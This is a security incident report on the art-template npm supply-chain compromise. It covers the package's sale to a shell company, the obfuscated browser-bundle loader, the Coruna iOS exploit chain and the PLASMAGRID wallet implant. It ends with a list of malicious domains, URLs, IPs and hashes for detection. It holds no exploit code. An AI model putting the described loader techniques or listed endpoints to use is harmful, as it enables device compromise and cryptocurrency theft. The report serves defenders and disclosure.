art-template sold to a shell company, then shipped the Coruna iOS exploit kit

On May 19, 2026, Socket published an account of an unusual npm supply-chain attack: the malicious code in three releases of the JavaScript template engine art-template had been shipped not by an account takeover but by the package's lawful new owner, eighteen months after a quiet sale to a Malaysian shell company. The kit at the end of the chain was Coruna, a well-documented iOS exploit framework, and the buyer's paperwork had been convincing enough to survive months of due diligence by the original maintainer.

art-template is a Chinese-origin JavaScript template engine, about 26,000 weekly npm downloads. The last clean release was 4.13.2 on 2018-11-13. On 2024-11-17 the original maintainer, GitHub user aui (糖饼), accepted an acquisition offer from KILLER WHAL AI SDN BHD, a Malaysian company at 35A Jalan SG3/1, Taman Sri Gombak, registration 202001036306. The pitch was cash plus continued maintenance. The author ran due diligence — SSM, law firm, contract, payment — and transferred npm and GitHub. aui was renamed to goofychris. The npm publisher list for art-template, express-art-template, art-template-loader, and koa-art-template moved to daughtrymom, npmpacketmaintainmember7 at npmpacketmaintainmember7@proton.me, and v4v5qc at eb8org@gmail.com. The receiving bank account was later flagged by Chinese law enforcement and bank risk controls; the buyer cooperated for months on paperwork until the freezes cleared, which kept the transfer plausible.

The first injection followed on 2025-03-12 in 4.13.3, published by v4v5qc. Node require('art-template') broke at the same release — the new owners had pulled the CommonJS compatibility out. The injection lived only in the browser bundle lib/template-web.js: a String.fromCharCode-obfuscated loader that fetched https://git.youzzjizz.com/git.js, which loaded Baidu Analytics at hm.baidu.com/hm.js?1351a72534dcecfcf4500eda9c5add00. The original author posted a GitHub Issues warning, "v4.13.3 contains a virus," and reported the package to npm. npm did not act. The next day goofychris published 4.13.4 with the injection removed and opened issue 661 on goofychris/art-template — "We made some mistakes in the update two days ago… we wanted to make simple statistics. If this violates any rules, we have cleaned it up." The new maintainers then deleted both the warning thread and their own explanation.

The npm reports sat. The second wave shipped on 2026-05-19 (4.13.5) and 2026-05-20 (4.13.6). The injection lived in lib/template-web.js again; the Node entry was untouched. 4.13.5 wrapped the loader in String.fromCharCode; 4.13.6 inlined the call in plaintext. The loader fetched v3.jiathis.com/code/jia.js from a compromised Chinese social-sharing CDN, pinged Baidu Analytics, and gated on User-Agent for iPhone. For iPhone it injected a zero-pixel iframe behind a closed Shadow DOM pointing at utaq.cfww.shop/gooll/gooll.html on 180.178.50.158, AS45753, Hong Kong. The iframe served a 50 KB fingerprinting loader that classified the device, beaconed every ten seconds to l1ewsu3yjkqeroy.xyz/api/ip-sync/sync behind Cloudflare, and content-addressed each follow-on module by SHA256(sessionKey + moduleHash)[:40] against session key cecd08aa6ff548c2.

The final stage was the Coruna iOS exploit kit. Fourteen remote modules, about 606 KB. Twenty-three Safari and WebKit vulnerabilities chained together. The kit stopped at iOS 17.3, matching the CVE-2024-23222 patch for the cassowary JavaScriptCore type-confusion bug. It dispatched between ARM64 and ARM64_32 builds and ran a WebAssembly proof-of-work to confirm a real JavaScriptCore JIT rather than a sandbox. The terminal payload was a 31 KB native ARM64 shellcode dropper for the PLASMAGRID cryptocurrency-wallet implant. Anything outside Safari on iOS 13.0 to 17.2.1 got only the Baidu tracker. Socket attributed the deployment to UNC6691 based on Coruna fingerprints previously documented by Google TAG, the JiaThis hijack, the bulk-registered .shop pattern, the Baidu integration, and the Hong Kong AS45753 infrastructure; SafeDep reached the same attribution independently.

Socket and SafeDep both advised downstream operators to pin art-template and its siblings to 4.13.2 and to audit caches and bundles for v3.jiathis.com, git.youzzjizz.com, utaq.cfww.shop, and l1ewsu3yjkqeroy.xyz. The harder problem sits upstream of the package manager. A clean legal acquisition leaves none of the forensic seams that an account takeover does, and there is no registry-side signal that distinguishes a maintainer who sold the project from one whose credentials were stolen.

Motive

Cryptocurrency Theft

Attribution

Group

Cause

Maintainer Ownership Transfer

Transitive

Yes

Actor

UNC6691

• Locationdistribution: npmjs.com/package/art-template
• Locationmirror: github.com/aui/art-template
• filelib/template-web.js
• file_sha256loader 49554fde7424c31c.js: f31bdd069fe7966ae11be1f78ee5dd44445938856dd1df12379e0e84a6851f5c
• file_sha1loader 49554fde7424c31c.js: 8064d4e0322f069b3dba13e7957ff0ca7dab7984
• file_md5loader 49554fde7424c31c.js: 6e79ae622b7ef30f31fdbcc2dc65339e
• domainv3.jiathis.com
• domaingit.youzzjizz.com
• domainutaq.cfww.shop
• domainl1ewsu3yjkqeroy.xyz
• domainhm.baidu.com
• urlhttps://utaq.cfww.shop/gooll/gooll.html
• urlhttps://l1ewsu3yjkqeroy.xyz/api/ip-sync/sync
• ipv4180.178.50.158
• ipv4172.67.141.14
• ipv4104.21.40.254
• cveCVE-2024-23222
• accountdaughtrymom (npm)
• accountnpmpacketmaintainmember7 (npm)
• accountv4v5qc (npm)
• accountgoofychris (GitHub, renamed from aui)
• organizationKILLER WHAL AI SDN BHD (Malaysia, registration 202001036306)
• campaign_codeCHMK6IG08F42496C22
• session_keycecd08aa6ff548c2

• Ownership of the GitHub repo and npm publisher list was transferred by the original maintainer on 2024-11-17 to KILLER WHAL AI SDN BHD under contract, after the maintainer ran SSM and law-firm due diligence. This is a deliberate transfer, not an account takeover; the seller documented the buyer's chain in https://github.com/aui/blog/issues/3.
• The 2025-03-12 4.13.3 injection used a different loader chain — git.youzzjizz.com front-loading Baidu Analytics via hm.baidu.com/hm.js?1351a72534dcecfcf4500eda9c5add00. The 2026-05 wave moved to v3.jiathis.com and the Coruna kit at utaq.cfww.shop.
• 4.13.4 (2025-03-14) was published from the new owners' account but contains no injection — released the day after the original maintainer's public warning, with a "we made some mistakes" explanation on goofychris/art-template issue 661 that the new maintainers later deleted along with the warning thread.
• 4.13.3 (2025-03-12), 4.13.5 (2026-05-19), and 4.13.6 (2026-05-20) are the malicious releases. 4.13.2 (2018-11-13) is the last release shipped by the original aui maintainer.
• Injection lives in the browser bundle (lib/template-web.js) only; Node consumers using the CommonJS entry point are unaffected. Anything pulling the browser bundle via <script> tag or client-side bundler ships the loader into every page.
• Coruna kit gates on Safari/WebKit and iOS 13.0-17.2.1; iOS 17.3 and later, Chrome, Firefox, Edge, and Android receive only the Baidu Analytics tracker. Final payload is the PLASMAGRID cryptocurrency-wallet implant.
• UNC6691 attribution is Socket's, based on Coruna kit fingerprints documented by Google TAG. SafeDep notes the same actor and kit independently.
• Sibling packages express-art-template, art-template-loader, and koa-art-template saw the same npm publisher turnover and should be treated as potentially affected; public reporting focused on art-template itself.

• The Takeover and Suspect Supply Chain Attack of art-template: A Detailed Account - auigithub.com
• Coruna Respawned: Compromised art-template npm Package - Socketsocket.dev
• art-template npm Supply Chain Compromise - SafeDepsafedep.io